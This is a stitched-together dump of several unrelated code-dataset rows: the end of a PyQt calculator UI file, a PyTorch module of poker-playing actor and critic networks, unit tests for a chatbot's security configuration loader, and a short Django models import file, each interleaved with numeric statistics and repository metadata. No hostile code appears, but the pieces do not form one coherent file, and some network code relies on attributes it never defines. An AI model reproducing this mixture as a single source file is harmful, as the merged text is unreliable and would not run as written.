Form.setWindowTitle(_translate("Form", "CalculatorOne (3.7)"))
self.writing_area.setToolTip(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:37pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"right\" dir=\'rtl\' style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.clear_line.setText(_translate("Form", "CE"))
self.seven.setText(_translate("Form", "7"))
self.four.setText(_translate("Form", "4"))
self.one.setText(_translate("Form", "1"))
self.arti_eksi.setText(_translate("Form", "+-"))
self.clear_all.setText(_translate("Form", "C"))
self.eight.setText(_translate("Form", "8"))
self.five.setText(_translate("Form", "5"))
self.two.setText(_translate("Form", "2"))
self.zero.setText(_translate("Form", "0"))
self.back.setText(_translate("Form", "↵"))
self.nine.setText(_translate("Form", "9"))
self.six.setText(_translate("Form", "6"))
self.three.setToolTip(_translate("Form", "<html><head/><body><p>ddd</p></body></html>"))
self.three.setText(_translate("Form", "3"))
self.virgul.setText(_translate("Form", "."))
self.bolme.setText(_translate("Form", "÷"))
self.carpma.setText(_translate("Form", "x"))
self.cikarma.setText(_translate("Form", "-"))
self.toplama.setText(_translate("Form", "+"))
self.esittir.setText(_translate("Form", "="))
| 53.919569 | 204 | 0.683516 | 7,565 | 65,027 | 5.857237 | 0.042829 | 0.140239 | 0.084496 | 0.1109 | 0.842316 | 0.820853 | 0.789348 | 0.782848 | 0.781223 | 0.781223 | 0 | 0.046857 | 0.190336 | 65,027 | 1,205 | 205 | 53.964315 | 0.794701 | 0.003706 | 0 | 0.732607 | 1 | 0 | 0.023866 | 0.005187 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001676 | false | 0 | 0.000838 | 0 | 0.003353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6cf8eb813884f44ad603adab7611de76c34460ee | 21,605 | py | Python | poker/models/networks.py | MorGriffiths/PokerAI | a68400f4918f10dde82574ad19654243c9a65024 | [
"MIT"
] | 2 | 2020-05-24T12:21:36.000Z | 2022-02-08T03:02:17.000Z | poker/models/networks.py | MorGriffiths/PokerAI | a68400f4918f10dde82574ad19654243c9a65024 | [
"MIT"
] | 3 | 2017-04-28T00:25:18.000Z | 2018-03-18T20:51:20.000Z | poker/models/networks.py | C5ipo7i/PokerAI | a68400f4918f10dde82574ad19654243c9a65024 | [
"MIT"
] | 2 | 2020-11-05T11:57:04.000Z | 2021-03-17T17:57:24.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from torch.distributions import Categorical
from poker_env.datatypes import Action
from models.model_utils import padding_index,count_parameters
from models.buffers import PriorityReplayBuffer,PriorityTree
from models.model_layers import EncoderAttention,VectorAttention,Embedder,GaussianNoise,PreProcessLayer,CTransformer,NetworkFunctions,IdentityBlock
from models.model_utils import mask_,hard_update,combined_masks,norm_frequencies,strip_padding,copy_weights
class BetAgent(object):
def __init__(self):
pass
def name(self):
return 'baseline_evaluation'
def __call__(self,state,action_mask,betsize_mask,target=False):
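        # Heuristic baseline: if any bet size is legal, bet (the first legal size index,
        # offset by 3 into the combined action space); otherwise pick the first legal
        # action category from the action mask.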
if betsize_mask.sum() > 0:
action = np.argmax(betsize_mask,axis=-1) + 3
else:
action = np.argmax(action_mask,axis=-1)
actor_outputs = {
'action':action,
'action_category':int(np.where(action_mask > 0)[-1][-1]),
'action_probs':torch.zeros(5).fill_(2.),
'action_prob':torch.tensor([1.]),
'betsize' : int(np.argmax(betsize_mask,axis=-1))
}
return actor_outputs
################################################
# Holdem Networks #
################################################
class Network(nn.Module):
def __init__(self):
super().__init__()
@property
def summary(self):
count_parameters(self)
class HoldemBaseline(Network):
def __init__(self,seed,nS,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nS = nS
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.maxlen = params['maxlen']
self.process_input = PreProcessLayer(params)
# self.seed = torch.manual_seed(seed)
self.mapping = params['mapping']
self.hand_emb = Embedder(5,64)
self.action_emb = Embedder(6,64)
self.betsize_emb = Embedder(self.nB,64)
self.noise = GaussianNoise()
self.emb = 1248
n_heads = 8
depth = 2
self.lstm = nn.LSTM(self.emb, 128)
# self.transformer = CTransformer(emb,n_heads,depth,self.max_length,self.nA)
self.fc1 = nn.Linear(528,hidden_dims[0])
self.fc2 = nn.Linear(hidden_dims[0],hidden_dims[1])
self.fc3 = nn.Linear(1280,self.combined_output)
self.dropout = nn.Dropout(0.5)
def forward(self,state,action_mask,betsize_mask):
mask = combined_masks(action_mask,betsize_mask)
x = state
if x.dim() == 2:
x = x.unsqueeze(0)
out = self.process_input(x).unsqueeze(0)
B,M,c = out.size()
n_padding = max(self.maxlen - M,0)
padding = torch.zeros(B,n_padding,out.size(-1))
h = torch.cat((out,padding),dim=1)
lstm_out,_ = self.lstm(h)
t_logits = self.fc3(lstm_out.view(-1))
category_logits = self.noise(t_logits)
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_category,betsize_category = self.helper_functions.unwrap_action(action,state[:,-1,self.mapping['state']['previous_action']])
outputs = {
'action':action,
'action_category':action_category,
'action_prob':m.log_prob(action),
'action_probs':action_probs,
'betsize':betsize_category
}
return outputs
class HoldemBaselineCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
# self.seed = torch.manual_seed(seed)
self.mapping = params['mapping']
self.process_input = PreProcessLayer(params,critic=True)
self.fc1 = nn.Linear(304,hidden_dims[0])
self.fc2 = nn.Linear(hidden_dims[0],hidden_dims[1])
self.fc3 = nn.Linear(hidden_dims[1],nA)
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(64,1)
self.advantage_output = nn.Linear(64,self.nA)
def forward(self,x,action):
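        # NOTE: this forward pass uses one_hot_ranks/one_hot_suits lookup tables and the
        # suit_conv/rank_conv/action_emb encoders, which are not created in __init__;
        # they are assumed to be attached to the instance elsewhere.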
M,c = x.size()
ranks = x[:,self.mapping['observation']['rank']].long()
suits = x[:,self.mapping['observation']['suit']].long()
vil_rank = x[:,self.mapping['observation']['vil_ranks']].long()
vil_suit = x[:,self.mapping['observation']['vil_suits']].long()
board_ranks = x[:,self.mapping['observation']['board_ranks']].long()
board_suits = x[:,self.mapping['observation']['board_suits']].long()
rank_input = torch.cat((ranks,board_ranks),dim=-1)
suit_input = torch.cat((suits,board_suits),dim=-1)
hot_ranks = self.one_hot_ranks[rank_input]
hot_suits = self.one_hot_suits[suit_input]
s = self.suit_conv(hot_suits.float())
r = self.rank_conv(hot_ranks.float())
hero = torch.cat((r,s),dim=-1)
rank_input2 = torch.cat((vil_rank,board_ranks),dim=-1)
suit_input2 = torch.cat((vil_suit,board_suits),dim=-1)
hot_ranks2 = self.one_hot_ranks[rank_input2]
hot_suits2 = self.one_hot_suits[suit_input2]
s2 = self.suit_conv(hot_suits2.float())
r2 = self.rank_conv(hot_ranks2.float())
villain = torch.cat((r2,s2),dim=-1)
# should be (b,64,88)
winner = hero - villain
last_action = x[:,self.mapping['observation']['previous_action']].long()
last_action = self.action_emb(last_action)
x = torch.cat([winner.view(M,-1),last_action],dim=-1)
x = self.activation(self.fc1(x))
x = self.activation(self.fc2(x))
outputs = {
'value':torch.tanh(self.fc3(x))
}
return outputs
class HoldemQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.process_input = PreProcessLayer(params)
self.maxlen = params['maxlen']
self.mapping = params['mapping']
emb = 1248
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,self.nA)
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(5,1)
self.advantage_output = nn.Linear(5,self.nA)
def forward(self,state):
x = state
if x.ndim == 2:
x = x.unsqueeze(0)
out = self.process_input(x).unsqueeze(0)
B,M,c = out.size()
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
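        # dueling aggregation: Q(s,a) = V(s) + A(s,a) - mean_a A(s,a)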
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
################################################
# Omaha Networks #
################################################
class OmahaBatchActor(Network):
def __init__(self,seed,nS,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nS = nS
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.maxlen = params['maxlen']
self.device = params['device']
self.process_input = PreProcessLayer(params)
# self.seed = torch.manual_seed(seed)
self.state_mapping = params['state_mapping']
self.hand_emb = Embedder(5,64)
self.action_emb = Embedder(Action.UNOPENED,64)
self.betsize_emb = Embedder(self.nB,64)
self.noise = GaussianNoise(self.device)
self.emb = 1248
n_heads = 8
depth = 2
self.lstm = nn.LSTM(1280, 128,bidirectional=True)
self.batchnorm = nn.BatchNorm1d(self.maxlen)
# self.blocks = nn.Sequential(
# IdentityBlock(hidden_dims=(2560,2560,512),activation=F.leaky_relu),
# IdentityBlock(hidden_dims=(512,512,256),activation=F.leaky_relu),
# )
self.fc_final = nn.Linear(2560,self.combined_output)
self.dropout = nn.Dropout(0.5)
def forward(self,state,action_mask,betsize_mask):
x = torch.tensor(state,dtype=torch.float32).to(self.device)
action_mask = torch.tensor(action_mask,dtype=torch.float).to(self.device)
betsize_mask = torch.tensor(betsize_mask,dtype=torch.float).to(self.device)
mask = combined_masks(action_mask,betsize_mask)
out = self.process_input(x)
B,M,c = out.size()
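        # zero-pad the processed history to maxlen steps (or truncate to the most
        # recent maxlen steps) before feeding it to the LSTM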
n_padding = self.maxlen - M
if n_padding < 0:
h = out[:,-self.maxlen:,:]
else:
padding = torch.zeros(B,n_padding,out.size(-1)).to(self.device)
h = torch.cat((out,padding),dim=1)
lstm_out,_ = self.lstm(h)
norm = self.batchnorm(lstm_out)
# blocks_out = self.blocks(lstm_out.view(-1))
t_logits = self.fc_final(norm.view(-1))
category_logits = self.noise(t_logits)
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_category,betsize_category = self.helper_functions.unwrap_action(action,state[:,-1,self.state_mapping['last_action']])
outputs = {
'action':action.item(),
'action_category':action_category.item(),
'action_prob':m.log_prob(action),
'action_probs':action_probs,
'betsize':betsize_category.item()
}
return outputs
class OmahaBatchObsQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.combined_output = nA - 2 + nB
self.process_input = PreProcessLayer(params,critic=True)
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
# self.lstm = nn.LSTM(1280, 128)
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def forward(self,obs):
x = torch.tensor(obs,dtype=torch.float32).to(self.device)
out = self.process_input(x)
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
class OmahaActor(Network):
def __init__(self,seed,nS,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nS = nS
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.maxlen = params['maxlen']
self.device = params['device']
self.epsilon = params['epsilon']
self.epsilon_weights = params['epsilon_weights'].to(self.device)
self.process_input = PreProcessLayer(params)
# self.seed = torch.manual_seed(seed)
self.state_mapping = params['state_mapping']
self.action_emb = Embedder(Action.UNOPENED,64)
self.betsize_emb = Embedder(self.nB,64)
self.noise = GaussianNoise(self.device)
self.emb = 1248
n_heads = 8
depth = 2
# self.attention = EncoderAttention(params['lstm_in'],params['lstm_out'])
self.lstm = nn.LSTM(params['lstm_in'],params['lstm_out'],bidirectional=True)
self.batchnorm = nn.BatchNorm1d(self.maxlen)
# self.blocks = nn.Sequential(
# IdentityBlock(hidden_dims=(2560,2560,512),activation=F.leaky_relu),
# IdentityBlock(hidden_dims=(512,512,256),activation=F.leaky_relu),
# )
self.fc_final = nn.Linear(5120,self.combined_output)
def set_device(self,device):
self.device = device
self.process_input.set_device(device)
def forward(self,state,action_mask,betsize_mask,target=False):
"""
state: B,M,39
"""
if not isinstance(state,torch.Tensor):
state = torch.tensor(state,dtype=torch.float32).to(self.device)
action_mask = torch.tensor(action_mask,dtype=torch.float32).to(self.device)
betsize_mask = torch.tensor(betsize_mask,dtype=torch.float32).to(self.device)
mask = combined_masks(action_mask,betsize_mask)
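        # exploration branch: when acting as the target policy, with probability epsilon
        # sample a random legal action weighted by epsilon_weights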
if target and np.random.random() < self.epsilon:
B = state.size(0)
# pick random legal move
action_masked = self.epsilon_weights * mask
action_probs = action_masked / action_masked.sum(-1).unsqueeze(-1)
action = action_probs.multinomial(num_samples=1, replacement=False)
action_prob = torch.zeros(B,1)
else:
out = self.process_input(state)
B,M,c = state.size()
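            # left-pad the history with zeros to maxlen steps (or keep only the most
            # recent maxlen steps) before the bidirectional LSTM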
n_padding = self.maxlen - M
if n_padding < 0:
h = out[:,-self.maxlen:,:]
else:
padding = torch.zeros(B,n_padding,out.size(-1)).to(self.device)
h = torch.cat((padding,out),dim=1)
lstm_out,hidden_states = self.lstm(h)
norm = self.batchnorm(lstm_out)
# self.attention(out)
# blocks_out = self.blocks(lstm_out.view(-1))
t_logits = self.fc_final(norm.view(B,-1))
category_logits = self.noise(t_logits)
# skip connection
# category_logits += h
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_prob = m.log_prob(action)
previous_action = torch.as_tensor(state[:,-1,self.state_mapping['last_action']]).to(self.device)
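        # recover the discrete action category and bet-size bucket from the flat action
        # index, using the previous action recorded in the state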
action_category,betsize_category = self.helper_functions.batch_unwrap_action(action,previous_action)
if B > 1:
# batch training
outputs = {
'action':action,
'action_category':action_category,
'action_prob':action_prob,
'action_probs':action_probs,
'betsize':betsize_category
}
else:
# playing hand
outputs = {
'action':action.item(),
'action_category':action_category.item(),
'action_prob':action_prob,
'action_probs':action_probs,
'betsize':betsize_category.item()
}
return outputs
class OmahaQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.combined_output = nA - 2 + nB
self.process_input = PreProcessLayer(params)
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
# self.lstm = nn.LSTM(1280, 128)
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def set_device(self,device):
self.device = device
self.process_input.set_device(device)
def forward(self,state):
x = torch.tensor(state,dtype=torch.float32).to(self.device)
out = self.process_input(x)
# B,M,c = out.size()
# n_padding = max(self.maxlen - M,0)
# padding = torch.zeros(B,n_padding,out.size(-1))
# h = torch.cat((out,padding),dim=1)
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
class OmahaObsQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.combined_output = nA - 2 + nB
# self.attention = VectorAttention(params['transformer_in'])
self.process_input = PreProcessLayer(params,critic=True)
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def set_device(self,device):
self.device = device
self.process_input.set_device(device)
def forward(self,obs):
if not isinstance(obs,torch.Tensor):
obs = torch.tensor(obs,dtype=torch.float32).to(self.device)
out = self.process_input(obs)
# context = self.attention(out)
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
class CombinedNet(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.process_input = PreProcessLayer(params)
self.lstm = nn.LSTM(1280, 128)
self.policy_out = nn.Linear(1280,self.combined_output)
self.noise = GaussianNoise(self.device)
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def forward(self,state,action_mask,betsize_mask):
x = torch.tensor(state,dtype=torch.float32).to(self.device)
action_mask = torch.tensor(action_mask,dtype=torch.float).to(self.device)
betsize_mask = torch.tensor(betsize_mask,dtype=torch.float).to(self.device)
mask = combined_masks(action_mask,betsize_mask)
out = self.process_input(x)
# Actor
B,M,c = out.size()
n_padding = self.maxlen - M
if n_padding < 0:
h = out[:,-self.maxlen:,:]
else:
padding = torch.zeros(B,n_padding,out.size(-1)).to(self.device)
h = torch.cat((out,padding),dim=1)
lstm_out,_ = self.lstm(h)
t_logits = self.policy_out(lstm_out.view(-1))
category_logits = self.noise(t_logits)
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_category,betsize_category = self.helper_functions.unwrap_action(action,state[:,-1,self.mapping['last_action']])
outputs = {
'action':action.item(),
'action_category':action_category.item(),
'action_prob':m.log_prob(action),
'action_probs':action_probs,
'betsize':betsize_category.item()
}
# Critic
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs['value'] = q.squeeze(0)
return outputs | 39.935305 | 147 | 0.604166 | 2,696 | 21,605 | 4.646884 | 0.089763 | 0.025543 | 0.025543 | 0.020754 | 0.806992 | 0.768678 | 0.753033 | 0.733637 | 0.715597 | 0.704342 | 0 | 0.021182 | 0.261421 | 21,605 | 541 | 148 | 39.935305 | 0.763928 | 0.064985 | 0 | 0.701794 | 0 | 0 | 0.050336 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058296 | false | 0.002242 | 0.022422 | 0.002242 | 0.130045 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9f544a61164f2e6c40e09f35ddb0ae3a30a89eeb | 7,890 | py | Python | dialogue-engine/test/programytest/config/brain/test_security.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 104 | 2020-03-30T09:40:00.000Z | 2022-03-06T22:34:25.000Z | dialogue-engine/test/programytest/config/brain/test_security.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 25 | 2020-06-12T01:36:35.000Z | 2022-02-19T07:30:44.000Z | dialogue-engine/test/programytest/config/brain/test_security.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 10 | 2020-04-02T23:43:56.000Z | 2021-05-14T13:47:01.000Z | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.config.file.yaml_file import YamlConfigurationFile
from programy.config.brain.security import BrainSecurityAuthorisationConfiguration
from programy.config.brain.security import BrainSecurityAuthenticationConfiguration
from programy.clients.events.console.config import ConsoleConfiguration
class BrainSecurityConfigurationTests(unittest.TestCase):
def test_authorisation_with_data_denied_srai(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authorisation:
classname: programy.security.authorise.passthrough.PassThroughAuthorisationService
denied_srai: AUTHORISATION_FAILED
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthorisationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authorise.passthrough.PassThroughAuthorisationService", service_config.classname)
self.assertEqual("AUTHORISATION_FAILED", service_config.denied_srai)
self.assertEqual(BrainSecurityAuthorisationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
def test_authorisation_with_data_denied_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authorisation:
classname: programy.security.authorise.passthrough.PassThroughAuthorisationService
denied_text: Authorisation Failed
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthorisationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authorise.passthrough.PassThroughAuthorisationService", service_config.classname)
self.assertEqual("Authorisation Failed", service_config.denied_text)
self.assertIsNone(service_config.denied_srai)
def test_authorisation_with_data_neither_denied_srai_or_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authorisation:
classname: programy.security.authorise.passthrough.PassThroughAuthorisationService
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthorisationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authorise.passthrough.PassThroughAuthorisationService", service_config.classname)
self.assertEqual(BrainSecurityAuthorisationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
self.assertIsNone(service_config.denied_srai)
def test_authentication_with_data_denied_srai(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authentication:
classname: programy.security.authenticate.passthrough.PassThroughAuthenticationService
denied_srai: AUTHENTICATION_FAILED
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthenticationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authenticate.passthrough.PassThroughAuthenticationService", service_config.classname)
self.assertEqual("AUTHENTICATION_FAILED", service_config.denied_srai)
self.assertEqual(BrainSecurityAuthenticationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
def test_authentication_with_data_denied_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authentication:
classname: programy.security.authenticate.passthrough.PassThroughAuthenticationService
denied_text: Authentication failed
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthenticationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authenticate.passthrough.PassThroughAuthenticationService", service_config.classname)
self.assertEqual("Authentication failed", service_config.denied_text)
self.assertIsNone(service_config.denied_srai)
def test_authentication_with_data_neither_denied_srai_or_text(self):
yaml = YamlConfigurationFile()
self.assertIsNotNone(yaml)
yaml.load_from_text("""
brain:
security:
authentication:
classname: programy.security.authenticate.passthrough.PassThroughAuthenticationService
""", ConsoleConfiguration(), ".")
brain_config = yaml.get_section("brain")
self.assertIsNotNone(brain_config)
services_config = yaml.get_section("security", brain_config)
self.assertIsNotNone(services_config)
service_config = BrainSecurityAuthenticationConfiguration()
service_config.load_config_section(yaml, services_config, ".")
self.assertEqual("programy.security.authenticate.passthrough.PassThroughAuthenticationService", service_config.classname)
self.assertEqual(BrainSecurityAuthenticationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
self.assertEqual(BrainSecurityAuthenticationConfiguration.DEFAULT_ACCESS_DENIED, service_config.denied_text)
| 49.006211 | 129 | 0.735488 | 747 | 7,890 | 7.542169 | 0.188755 | 0.069223 | 0.027689 | 0.042599 | 0.79819 | 0.795882 | 0.774405 | 0.772985 | 0.772985 | 0.770501 | 0 | 0.000627 | 0.191255 | 7,890 | 160 | 130 | 49.3125 | 0.882307 | 0.134601 | 0 | 0.830508 | 0 | 0 | 0.281965 | 0.134604 | 0 | 0 | 0 | 0 | 0.305085 | 1 | 0.050847 | false | 0.101695 | 0.042373 | 0 | 0.101695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
9fb36c76c0f027c09d1a14f3ed61c4c5fba3b1ea | 164 | py | Python | sic_financeiro/core/models/__init__.py | diegoMasin/project-sic-financeiro | a06d4c873014e0835afa37437ad8f57c24f78163 | [
"MIT"
] | null | null | null | sic_financeiro/core/models/__init__.py | diegoMasin/project-sic-financeiro | a06d4c873014e0835afa37437ad8f57c24f78163 | [
"MIT"
] | null | null | null | sic_financeiro/core/models/__init__.py | diegoMasin/project-sic-financeiro | a06d4c873014e0835afa37437ad8f57c24f78163 | [
"MIT"
] | null | null | null | from sic_financeiro.core.models.contas import Conta
from sic_financeiro.core.models.tags import Tag
from sic_financeiro.core.models.tipo_despesa import TipoDespesa
| 41 | 63 | 0.871951 | 25 | 164 | 5.56 | 0.52 | 0.151079 | 0.366906 | 0.453237 | 0.582734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 164 | 3 | 64 | 54.666667 | 0.914474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
